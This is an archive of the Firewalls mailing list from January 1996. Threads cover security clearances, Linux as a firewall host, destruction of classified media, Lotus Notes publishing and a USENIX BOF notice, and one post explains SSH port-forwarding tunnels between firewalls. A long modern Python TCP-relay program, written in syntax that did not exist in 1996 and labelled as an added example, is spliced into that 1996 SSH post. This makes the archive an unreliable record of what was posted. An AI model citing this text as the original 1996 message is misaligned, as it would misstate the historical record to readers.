>> I hold a TS SCI clearance with the Air Force. I've been in for almost 10
>> years, and I've never heard of a "Q" clearance.
>
>Ten years ago is too recent. Back in the days of free trips to SouthEastAsia
>there were several compartmented levels above Top Secret such as "R"
>and "Crypto" that usually required EBIs. "Q" referred to certain "special
>weapons" that I will not go into further. Does Brain21's father glow in the
>dark ?
> Warmly,
> Padgett
>
>

TS SCI is for the Intelligence Agencies (NSA, CIA, etc) and within that you have compartmented clearances. Q is for DOE Labs and is considered as stringent as TS/SI. It used to be if you had TS SCI they wouldn't accept your clearance at DOE and vice-versa. I think they got wise recently and decided that each other must be ok after all but they still have different clearance systems that don't interact.

dml
======================================================================
Dale Lancaster
Raptor Systems
dalel@netcom.com
(214) 423-6212
"My opinions are my own ... who else would have them? :-)"
======================================================================

From firewalls-owner Sat Jan 13 08:55:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA18575 for firewalls-outgoing; Sat, 13 Jan 1996 08:54:09 -0800 (PST)
Received: from neon.ingenia.com (neon.ingenia.com [205.207.219.29]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA18570 for ; Sat, 13 Jan 1996 08:54:04 -0800 (PST)
Received: (from shaver@localhost) by neon.ingenia.com (8.6.12/8.6.9) id MAA10961; Sat, 13 Jan 1996 12:16:12 -0500
From: Mike Shaver
Message-Id: <199601131716.MAA10961@neon.ingenia.com>
Subject: Re: Linux as a firewall
To: dana@nav.cc.tx.us (Dana Brewer)
Date: Sat, 13 Jan 1996 12:16:11 -0500 (EST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "Dana Brewer" at Jan 12, 96 10:20:14 am
X-Mailer: ELM [version 2.4 PL24 PGP3 *ALPHA*]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Thus spake Dana Brewer:
> I've noticed that a lot of people say they use Linux as part of their
> Internet firewall. But now I've had a company tell me that Linux isn't a
> true multi-tasking operating system, so it shouldn't be used as a
> firewall. What's the true story here?

For the record, we don't use Linux as our firewall, but we do use it for just about every other part of our network. The reasons for not using it as our firewall are not related to the suitability of Linux for such a task. We may, in fact, be using Linux as a firewall internally very shortly. I've built a number of firewalls for clients that included a Linux machine as a bastion or filtering router.

As far as the "not true multi-tasking", I suspect they're referring to the fact that it's not kernel-preemptive under the default configuration. There exist POSIX.4 extensions -- I think they're part of the standard kernel now (now == 1.3.57) -- which allow real-time scheduling. I don't know enough about real-time to tell you how much it helps, but I can tell you that the SMP bunch are working on finely-grained kernel locking and such, which puts it on par with just about every other SMP-capable OS. Kernel threads, as well, are here, for those who want to do assembly system calls. =) They're really just waiting for library support, I think, and should be "ready for prime time" and easily usable for the functional freeze preceding 1.4.

Regardless, Linux is just as "true multitasking" as BSDI, and I don't want to be the one who tells mjr that BSDI isn't suitable for firewalls. =)

Using Linux for a firewall may or may not save you money. You save some capital expenditures in the area of software purchase, but whether it's an overall savings is dependent on your facility with the system. This is likely true with all roll-your-own 'walls, though. (If you're buying a shrink-wrapped one, then the underlying OS may or may not be a concern.)

You _can_ get support for Linux, you just have to know where to look.
On traditional levels, there are organizations that offer support agreements with whatever level of service you're willing to pay for. Heck, we do it, although geography might be an issue. On other levels, you'll find the "vendors" to be much more responsive to questions (newbie or technical) than you will for many other OSes. (If you can find a bug and isolate the cause, submit a patch -- you have the source, right? -- and odds are very good it'll be incorporated into the next release. About a week, usually.)

Security patches for Linux are typically quite timely, due to a combination of source availability for most of the environment (kernel, utilities, etc.) and the very large development base.

Installation is pretty straightforward, if you get a good distribution. Redhat, for example. The stability of the kernel development process is often cited as a Bad Thing, since a new kernel is released at least once a week. You don't have to upgrade if you don't want to, though. Stick with what works...

Performance-wise, Linux is no longer as bad as it once was. (1.0 was pretty brutal, especially where the networking was concerned.) The most recent releases (dubbed "Greased Weasel", for reasons that only Linus understands) are quite fast, due to improved page-management stuff, among other improvements. Linux has the fastest task switching of any Unix-like OS out there, as benchmarked by Larry McVoy. (Who knows his Unix...)

> Ideally, in our situation, the
> bastion host would be the firewall, the WWW server, the ftp server, the
> Usenet news server, etc... Is this completely unrealistic?

It's quite realistic... I did it last week. =)

Basically, Linux is no less suitable for firewalling than any other OS with which you are equally familiar.

Mike
--
#> Mike Shaver (shaver@ingenia.com)   Ingenia Communications Corporation <#
#> UNIX medicine man -- dark magick, cheap!                               <#
#>                                                                        <#
#> When the going gets tough, the tough give cryptic error messages.      <#
#> "We believe in rough consensus and running code."                      <#

From firewalls-owner Sat Jan 13 10:25:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA19924 for firewalls-outgoing; Sat, 13 Jan 1996 10:24:03 -0800 (PST)
Received: from VM.AKH-WIEN.AC.AT (VM.akh-wien.ac.at [149.148.50.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA19919 for ; Sat, 13 Jan 1996 10:23:58 -0800 (PST)
Received: from [149.148.89.132] by VM.AKH-WIEN.AC.AT (IBM VM SMTP V2R3) with TCP; Sat, 13 Jan 96 19:22:09 CET
X-Sender: chrisi@vm.akh-wien.ac.at
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Date: Sat, 13 Jan 1996 20:13:27 +0100
To: firewalls@greatcircle.com
From: Chrisi@akh-wien.ac.at (Chrisi)
Subject: Security Tip
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

we plan to connect several HPs through the Internet; like everybody, we are thinking of:

* low cost (do we need a separate computer for a firewall and the production machine -> with a database, WWW server)
* can we enhance security with *just* the router (limitations for access etc.)
* we *only* want to use http, smtp, snmp, telnet and SQL-Net (a long list..)

Sorry if my questions are very basic, but we are just starting our project in this direction.
Thanks a lot for your answers,

Christian

From firewalls-owner Sat Jan 13 11:10:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA20495 for firewalls-outgoing; Sat, 13 Jan 1996 11:00:11 -0800 (PST)
Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA20480 for ; Sat, 13 Jan 1996 11:00:04 -0800 (PST)
Received: from reynaldo.parc.xerox.com ([13.2.116.96]) by alpha.xerox.com with SMTP id <14708(14)>; Sat, 13 Jan 1996 10:58:59 PST
Received: from localhost ([127.0.0.1]) by reynaldo.parc.xerox.com with SMTP id <34953>; Sat, 13 Jan 1996 10:58:36 -0800
X-Mailer: exmh version 1.6.4 10/10/95
To: firewalls@greatcircle.com
cc: kerch@parc.xerox.com
Subject: Re: "Q" Clearance
In-reply-to: Your message of "Fri, 12 Jan 1996 13:39:07 EST."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Sat, 13 Jan 1996 10:58:33 PST
From: Berry Kercheval
Message-Id: <96Jan13.105836pst.34953@reynaldo.parc.xerox.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>>>"A. Padgett Peterson, P.E. Information Security" said:
> > I hold a TS SCI clearance with the Air Force. I've been in for almost 10
> > years, and I've never heard of a "Q" clearance.
>
> "Q" referred to certain "special
> weapons" that I will not go into further.

It's really not that hard. Top Secret is a Department of Defense clearance level. "Q" is a Department of Energy clearance level. The DoD controls all the military in the US. The DoE controls research, development and construction of nuclear weapons. All permanent employees of, say, Lawrence Livermore National Laboratory, run by the DoE (where I worked for 4 years) get "Q" clearances. I've had both.
--berry
Berry Kercheval :: kerch@parc.xerox.com :: Xerox Palo Alto Research Center

From firewalls-owner Sat Jan 13 12:10:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA21509 for firewalls-outgoing; Sat, 13 Jan 1996 11:56:16 -0800 (PST)
Received: from linknet.kitsap.lib.wa.us (linknet.kitsap.lib.wa.us [198.187.135.22]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA21504 for ; Sat, 13 Jan 1996 11:56:12 -0800 (PST)
Received: (from jpaine@localhost) by linknet.kitsap.lib.wa.us (8.6.12/8.6.9) id LAA27902; Sat, 13 Jan 1996 11:55:22 -0800
Date: Sat, 13 Jan 1996 11:55:20 -0800 (PST)
From: john paine
To: Kent Hamilton
cc: "Paul D. Robertson" , firewalls@GreatCircle.COM
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)
In-Reply-To: <199601130439.WAA05762@gwydion.hns.st-louis.mo.us>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 12 Jan 1996, Kent Hamilton wrote:

> > On Thu, 11 Jan 1996, Brain21 wrote:
> >
> > > On Thu, 11 Jan 1996, Benjamin Allan Smith wrote:
> > >
> > > > email (3 complete overwrites with random data if I recall correctly) and then
> > >
> > > I thought that the NSA could read approx. 7 writes deep. If thought that
> > > you just put bullets in those drives (quite literally) instead of
> > > rewriting them.
> > >
> >
> > I'm sure someone who has a better memory will correct me, but I think
> > three or five complete overwrites used to be approved for up to secret
> > (no longer approved, and may have actually been for up to top secret,
> > memory fades).
>
> I think it used to be 3 over-writes when I last had to worry about it.
>
> [ removed ]
>
> > Back before I entered the world of real classified, we had a big green
> > sledgehammer with which to destroy our secret wartime data that resided
> > on 2314 diskpacks. The BFGSH (Big _____ Green Sledge Hammer), correctly
> > wielded was I would suppose approved for emergency destruction only. I
> > don't think they trusted us with too many thermite grenades :(
>
> Hey, ours was *RED*..... :-) Actually for disk packs with TS on 'em
> the approved method for destruction about 7 years ago was to take a
> sander to the platter then degauss what was left... no idea if it's
> changed since then.
>
> --
> Kent Hamilton                           Work: KHamilton@Hunter.COM
> URL: http://www.icon-stl.net/~khamilto  Play: KentH@HNS.St-Louis.Mo.US
>

Right now, there is a red hammer for the equipment, but the TS disposal method is (if I can remember the order correctly) degaussing, shredding, incineration and fusing (into a block of metallic ash).

Jazzman

From firewalls-owner Sat Jan 13 12:55:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA23592 for firewalls-outgoing; Sat, 13 Jan 1996 12:50:49 -0800 (PST)
Received: from ic.co.at (ns.ic.co.at [193.81.168.69]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA23587 for ; Sat, 13 Jan 1996 12:50:40 -0800 (PST)
Received: from ic.co.at (ic.co.at [193.80.225.2]) by ic.co.at (8.7.2/8.7.3) with SMTP id VAA06320; Sat, 13 Jan 1996 21:51:51 -0100
Date: Sat, 13 Jan 1996 21:51:51 -0100 (GMT-0100)
From: Michael Haberler
To: harti@eunet.co.at, cr@austria.eu.net
cc: eunet-tech@eu.net, mheppe@oekb.co.at, macsek@oekb.co.at, martinek@oenb.co.at, revay@ibmvie.co.at, franz.simlinger@efp.co.at, martin.knoll@tiwag.co.at, krenn@tcs.co.at, firewalls@greatcircle.com, mko@downlink.co.at, kraml@kpmg.co.at, Michael Haberler
Subject: Secure fw/fw tunnels with SSH
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Sometimes it's desirable to have a secure tunnel for a specific service; assume one site runs e.g. an Oracle server, another site an Oracle client, but the customer wants the client/server connection to be encrypted as long as it goes over the Internet. Most TCP-based services can be tunneled this way.

This is very easy to do with Secure Shell (see ftp://ftp.cs.hut.fi/pub/ssh) which is a rlogin/rsh replacement using strong encryption and authentication techniques, even if the actual servers and clients are behind a proxy setup and their IP addresses are not end-to-end-reachable.

Assume you have the following setup; client wants to connect securely to port 1521 (sqlnet) on server.

    client--->fw1------>Internet--------->fw2-->server
          <-c1->  <-----------c2------------> <-c3->

Choose a port X, eg 1200, on fw1, and make sure this port can only be connected to from inside, not the Internet. Also, on fw2 choose a port for ssh (default 22), and permit connections from fw1 to it.

Set up sshd on fw2. We use only RSA encryption, 768bit keys, and do not use the .rhosts/hosts.equiv BSD compatibility feature of ssh.

On fw1 and fw2 set up a Unix user, eg 'tunnel'. Login on fw1 as that user, and run ssh-keygen to create a public/private key pair for that user. Append the public key of that user (fw1:~tunnel/.ssh/identity.pub) to fw2:~tunnel/.ssh/authorized_keys. Thus user fw1/tunnel will be able to connect to ssh on fw2, and be RSA authenticated. Make sure ~tunnel/.ssh is properly protected. Do not expose fw1:~tunnel/.ssh/identity.pub by all means.

Now, on fw1, start slogin (and keep it running, e.g. by running it via inittab):

    slogin -x -n -v -C -c 3des -L 1200:server.dom.ain:1521 \
        firewall2.dom.ain /path/sleep-forever

This will open a listen port (fw1/port 1200). TCP connections to this port will cause sshd on fw2 to connect to server/1521 and forward all data sent/received over it, encrypting it between fw1 and fw2. (-v so you see what's going on, see the slogin manpage for details.)
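The plumbing that slogin -L performs on fw1, written out as a plain TCP relay so the c1/c3 legs and the "only connectable from inside" check can be seen and exercised offline. This is an added example, not code from the post or from ssh: the relay does not encrypt anything (ssh does that on the fw1-fw2 leg), the ports are chosen at runtime on 127.0.0.1, and the allowed client block, the uppercasing stand-in for the Oracle listener and the sample query are assumptions.

```python
"""Plain TCP relay modelling the listener that `slogin -L 1200:server:1521`
opens on fw1.  Added example, not from the post and not ssh itself: there is
no encryption here.  Addresses, ports and the echo stand-in are assumed."""
import ipaddress
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src hits EOF, then half-close dst."""
    try:
        while chunk := src.recv(4096):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_forwarder(target: tuple, allowed_cidr: str = "127.0.0.0/8") -> tuple:
    """Listen on an ephemeral loopback port and relay accepted connections
    to `target`.  Returns (listen_port, stop_event).

    Only peers inside `allowed_cidr` are served: this is the post's "make sure
    this port can only be connected to from inside" as a per-connection check
    (on a real fw1 you would also bind to the inside interface and filter)."""
    allowed = ipaddress.ip_network(allowed_cidr)
    lsock = socket.socket()
    lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsock.bind(("127.0.0.1", 0))
    lsock.listen(5)
    lsock.settimeout(0.2)          # lets the accept loop notice stop_event
    stop = threading.Event()

    def serve() -> None:
        while not stop.is_set():
            try:
                conn, peer = lsock.accept()
            except socket.timeout:
                continue
            if ipaddress.ip_address(peer[0]) not in allowed:
                conn.close()       # not from inside: refuse
                continue
            upstream = socket.create_connection(target)   # the c3 leg
            # One thread per direction, plumbing c1 <-> c3 together.
            threading.Thread(target=_pump, args=(conn, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, conn), daemon=True).start()
        lsock.close()

    threading.Thread(target=serve, daemon=True).start()
    return lsock.getsockname()[1], stop


def start_echo_server() -> int:
    """Stand-in for the listener on server:1521 (constructed): reads the
    request to EOF and answers with it uppercased.  Returns its port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve() -> None:
        while True:
            conn, _ = srv.accept()
            data = b""
            while chunk := conn.recv(4096):
                data += chunk
            conn.sendall(data.upper())
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def round_trip(port: int, payload: bytes) -> bytes:
    """Act as the client on the c1 leg: connect to fw1's listen port, send
    `payload`, half-close, and return whatever comes back (b"" if refused)."""
    try:
        with socket.create_connection(("127.0.0.1", port), timeout=3) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)
            out = b""
            while chunk := c.recv(4096):
                out += chunk
            return out
    except OSError:
        return b""


if __name__ == "__main__":
    server_port = start_echo_server()
    listen_port, stop = start_forwarder(("127.0.0.1", server_port))
    print(round_trip(listen_port, b"select 1 from dual"))
    stop.set()
```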
---
Michael Haberler                              mah@eunet.co.at
EUnet Austria Ltd                             MH182
A-1090 Vienna, Austria, Thurngasse 8/16
Tel: +43 (1) 31376    fax: +43 (1) 3106926

From firewalls-owner Sat Jan 13 13:10:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA23788 for firewalls-outgoing; Sat, 13 Jan 1996 13:02:39 -0800 (PST)
Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA23783 for ; Sat, 13 Jan 1996 13:02:34 -0800 (PST)
Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id QAA21739; Sat, 13 Jan 1996 16:01:05 -0500 (EST)
Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id QAA01982; Sat, 13 Jan 1996 16:01:00 -0500 (EST)
Date: Sat, 13 Jan 1996 16:00:57 -0500 (EST)
From: "Paul D. Robertson"
To: john paine
cc: Kent Hamilton , firewalls@GreatCircle.COM
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sat, 13 Jan 1996, john paine wrote:

> Right now, there is a red hammer for the equipment, but the TS
> disposal method is (if I can remember the order correctly) degaussing,
> shredding, incineration and fusing (into a block of metallic ash).

That sounds about right. The sledge was when I was in Germany, and the highest thing we had on-site was Secret. There were a couple of times when I'd have liked to have been able to take it to the 360 itself.

When I was at the White House, someone else used to take care of getting rid of equipment, as we didn't have the means to do it on-site.

To stay somewhat on-topic, does anyone have any interesting corporate policies about the removal of dead media from their sites?

Paul.
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
PSB#9280

From firewalls-owner Sat Jan 13 13:25:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA25013 for firewalls-outgoing; Sat, 13 Jan 1996 13:20:43 -0800 (PST)
Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA25005; Sat, 13 Jan 1996 13:20:38 -0800 (PST)
X-Sender: brent@miles.greatcircle.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sat, 13 Jan 1996 13:20:58 +0100
To: "Paul D. Robertson" , john paine
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)
Cc: Kent Hamilton , firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 4:00 PM 1/13/96, Paul D. Robertson wrote:

>To stay somewhat on-topic, does anyone have any interesting corporate
>policies about the removal of dead media from their sites?

While a somewhat interesting/amusing issue, I don't think it has any particular relevance to Firewalls. Let's let this thread die...

-Brent
----------------------+----------------------------+------------------------
Brent Chapman         | Great Circle Associates    | 1057 West Dana Street
Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041
----------------------+----------------------------+------------------------
                   Internet Tutorials from the Experts!
From firewalls-owner Sat Jan 13 13:40:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA25462 for firewalls-outgoing; Sat, 13 Jan 1996 13:28:40 -0800 (PST)
Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA25454 for ; Sat, 13 Jan 1996 13:28:35 -0800 (PST)
X-Sender: brent@miles.greatcircle.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sat, 13 Jan 1996 13:28:55 +0100
To: Firewalls@GreatCircle.COM
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Firewalls BOF at USENIX in San Diego, Wed 24 Jan, 10-11pm
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The Firewalls Birds of a Feather session (BOF) at the USENIX conference in San Diego later this month will be on Wednesday night, 24 Jan, from 10-11pm. As is traditional, it will be held immediately after the CERT BOF (9-10pm), in the same room. As is also traditional, I'll be refereeing.

As is NOT traditional, the USENIX reception is on Wednesday this time (it's usually on Thursday), just before the CERT and Firewalls BOFs. So, like usual, many folks will be feeling no pain by the time the Firewalls BOF starts.

The official description of the BOF:

    The Firewalls BOF is a place for folks interested in the design,
    construction, operation, and maintenance of Internet security
    firewall systems to get together and swap tips, tricks, questions,
    and answers about their creations. The BOF will be refereed by
    Brent Chapman, manager of the Firewalls mailing list and coauthor
    of the O'Reilly & Associates book "Building Internet Firewalls".

For more information about the conference, visit http://www.usenix.org/ or send email to conference@usenix.org or call the USENIX conference office at 714/588-8649.

-Brent
----------------------+----------------------------+------------------------
Brent Chapman         | Great Circle Associates    | 1057 West Dana Street
Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041
----------------------+----------------------------+------------------------
                   Internet Tutorials from the Experts!

From firewalls-owner Sat Jan 13 16:25:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA11660 for firewalls-outgoing; Sat, 13 Jan 1996 16:09:29 -0800 (PST)
Received: from newsgw.mentorg.com (newsgw.mentorg.com [137.202.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA11640 for ; Sat, 13 Jan 1996 16:09:23 -0800 (PST)
Received: from wv.wv.mentorg.com by newsgw.mentorg.com (8.6.4/CF5.22R) id TAA10884; Sat, 13 Jan 1996 19:08:11 -0500
Received: from pdxml2.mentorg.com by wv.wv.mentorg.com (8.6.8.1/CF5.22R) id QAA11217; Sat, 13 Jan 1996 16:08:20 -0800
Date: 13 Jan 1996 16:08:53 -0800
From: "E-Mail Admin"
Subject: Off-Topic- Selling Firewall
To: firewalls@greatcircle.com
X-Mailer: Mail*Link SMTP/QM 3.0.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mail*Link(r) SMTP                      Off-Topic: Selling Firewalls

Received: by pdxml2.mentorg.com with SMTP;7 Jan 1996 08:02:17 -0800
Received: from relay4.UU.NET by newsgw.mentorg.com (8.6.4/CF5.22R) id KAA29854; Sun, 7 Jan 1996 10:56:50 -0500
Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQzxmt14000; Sun, 7 Jan 1996 10:54:56 -0500 (EST)
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA10968 for firewalls-outgoing; Sun, 7 Jan 1996 05:16:49 -0800 (PST)
Received: from vogon.muc.de (vogon.muc.de [193.174.4.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA10963 for ; Sun, 7 Jan 1996 05:16:38 -0800 (PST)
Received: from cottage ([194.94.228.134]) by vogon.muc.de with SMTP id <93554-2>; Sun, 7 Jan 1996 14:15:08 +0100
Comments: Authenticated
sender is
From: "Andreas Grau"
To: firewalls@greatcircle.com
Date: Sun, 7 Jan 1996 15:12:30 +0100
Subject: Off-Topic: Selling Firewalls
Reply-to: grau@muc.de
X-mailer: Pegasus Mail for Windows (v2.23)
Message-Id: <96Jan7.141508met.93554-2@vogon.muc.de>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Please don't flame me for this (possibly) off-topic question, but I think the best answer for my question is with the members of this great list.

I started working for a VAR of firewalls and other network related products. When it comes to writing proposals, I feel there must be tools to effectively support the selling process:

- how to draw network designs
- how to calculate network topology, eg. IP-numbers and netmasks
- how to calculate the costs for the equipment (firewalls, routers ...)
- how to ...

How do you network consultants and resellers work out there, how do you make your life easier when it comes to desktop work? I feel there are better tools than M$-Word or Powerpoint to generate good proposals and solutions.

TIA, Andreas

--
Andreas Grau          grau@muc.de

From firewalls-owner Sat Jan 13 19:55:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA03163 for firewalls-outgoing; Sat, 13 Jan 1996 19:51:41 -0800 (PST)
Received: from wire.paladin.com (wire.paladin.com [198.69.226.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA03150 for ; Sat, 13 Jan 1996 19:51:35 -0800 (PST)
Received: (cjwoods@localhost) by wire.paladin.com (8.6.8/8.6.5) id PAA00454; Sat, 13 Jan 1996 15:00:07 -0500
Date: Sat, 13 Jan 1996 15:00:07 -0500 (EST)
From: Chris Woods
To: Dana Brewer
cc: firewalls@GreatCircle.COM
Subject: Re: Linux as a firewall
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 12 Jan 1996, Dana Brewer wrote:

> I've noticed that a lot of people say they use Linux as part of their
> Internet firewall. But now I've had a company tell me that Linux isn't a
> true multi-tasking operating system, so it shouldn't be used as a
> firewall. What's the true story here? Ideally, in our situation, the
> bastion host would be the firewall, the WWW server, the ftp server, the
> Usenet news server, etc... Is this completely unrealistic?

My guess is that that company, like many others, is not comfortable with the thought of running free software in a mission-critical environment (reasonable fear, IMHO, until you actually use linux...). Many larger companies are not comfortable unless they're paying through the nose for something.

Linux has all the limitations of any intel-based OS. However, I have run networks on all linux machines, supporting thousands of users. I ran the systems for a fairly large ISP. The main web server was a P90 with 32MB RAM running Apache 0.6.5 httpd, and it didn't even break a sweat. There have been problems with threading in linux, and the solution for that (which affected performance only in extreme cases) was to run a non-forking http server.

TIS' fwtk offers quite a bit of flexibility. We are devising a solution whereby we build firewalls for clients, using a linux machine, fwtk, and running mailservers, http servers, ftp servers, and DNS servers on that machine.

In short: linux/intel is a very *very* cost-effective solution; you get "more bang for your buck" with linux than with any other platform that I've worked with, until you reach the limitations of the intel-based architecture. That ceiling is very high, though, especially with the advent of SMP linux.

Chris Woods                       cjwoods@paladin.com (office)
Systems Administrator             cjwoods@gigotech.net (home)
Paladin Computing Solutions       http://www.paladin.com
"A computer without Windows is like a fish without a bicycle."
From firewalls-owner Sun Jan 14 00:55:45 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA02224 for firewalls-outgoing; Sun, 14 Jan 1996 00:40:40 -0800 (PST)
Received: from whirlwind.momentum.com.au (whirlwind.momentum.com.au [203.2.238.131]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA02196 for ; Sun, 14 Jan 1996 00:40:24 -0800 (PST)
Received: (from uucp@localhost) by whirlwind.momentum.com.au (8.6.12/8.6.12) id QAA11281; Sun, 14 Jan 1996 16:39:14 +0800
Received: from aristoi.momentum.com.au(203.2.238.138) by whirlwind via smap (V1.3mjr) id sma011276; Sun Jan 14 16:38:53 1996
X-Sender: todd@mailhost.momentum.com.au
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 14 Jan 1996 16:39:47 +0800
To: Firewalls@GreatCircle.COM
From: todd@momentum.com.au (Todd Hooper)
Subject: Re: Lotus Notes' Internotes Web Navigator
Cc: gblolmxb@ibmmail.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mark Blackman (gblolmxb@ibmmail.com) writes:

> On 13/12/95 (or 12/13/95 for those of you in the colonies), Lotus
> announced the integration of their Internotes Publisher product with
> soon-to-be-released Notes 4. They also announced Web navigator
> software for the Notes client.
>
> Has anyone got any other info on this? Such as:
>
> o how are HTML retrieve requests routed through a Notes infrastructure
>   to the Notes server
>
> o What sort of security is provided at the Notes server, e.g. is a
>   separate firewall needed between the ISP line & the Server?
>
> o Are FTP & SMTP links in web pages supported?
>
> o Has anyone 'seen' it working?

I'm not sure exactly which component you are asking about, but I'll have a shot at it!

I haven't worked with the Notes 4 integrated Navigator component, but we have successfully prototyped and implemented a couple of client systems using the Internotes Webpublisher component. It is a useful product for automated translation and organisation of large Web sites.

WebPublisher (put simply) is a Notes server task which turns administrator selected Notes databases into HTML files on the Notes server. In all of our implementations, an automated process then picks up the HTML, passes it out thru the firewall on to the corporate Web server, linking it into the existing document hierarchy at the correct point.

About the only security issues I can see:

1. Translation and publishing of the wrong database

   There are three specific checkpoints to avoid this. One - separate servers for highly sensitive Notes work. Two - properly secured and administered WebPublisher config database. Three - HTML transfer process requires each Notes database to be explicitly named on both the source and destination host.

2. Requiring Web forms input to Notes via CGI's

   The WebPublisher system does allow you to take Web input and have it end up in Notes databases. This won't work when you use a setup where the actual Web serving is done by a different machine to the Notes serving. If you were to allow this, you would need to analyse the security of the CGI running directly on your NT or OS/2 Notes server and make a decision based on that. You could probably make a case that it is no better or worse than your average Unix CGI, but a wise approach may be to maintain a separate Notes server regardless.

Regards,

Todd

--
Todd Hooper             Internet : todd@momentum.com.au
Momentum Pty Ltd        Phone    : 09 380 4372
Western Australia       Fax      : 09 380 4371

From firewalls-owner Sun Jan 14 02:25:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA10075 for firewalls-outgoing; Sun, 14 Jan 1996 02:13:30 -0800 (PST)
Received: from solair1.inter.NL.net (solair1.inter.NL.net [193.78.240.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA10070 for ; Sun, 14 Jan 1996 02:13:24 -0800 (PST)
Received: from asp99-15.Amsterdam.NL.net by solair1.inter.NL.net (5.65b/solair1.Inter.NL.net-1.31) id AA01632; Sun, 14 Jan 1996 11:12:21 +0100
Date: Sun, 14 Jan 1996 11:12:21 +0100
Message-Id: <9601141012.AA01632@solair1.inter.NL.net>
X-Sender: avos@solair1.inter.NL.net (Unverified)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.COM
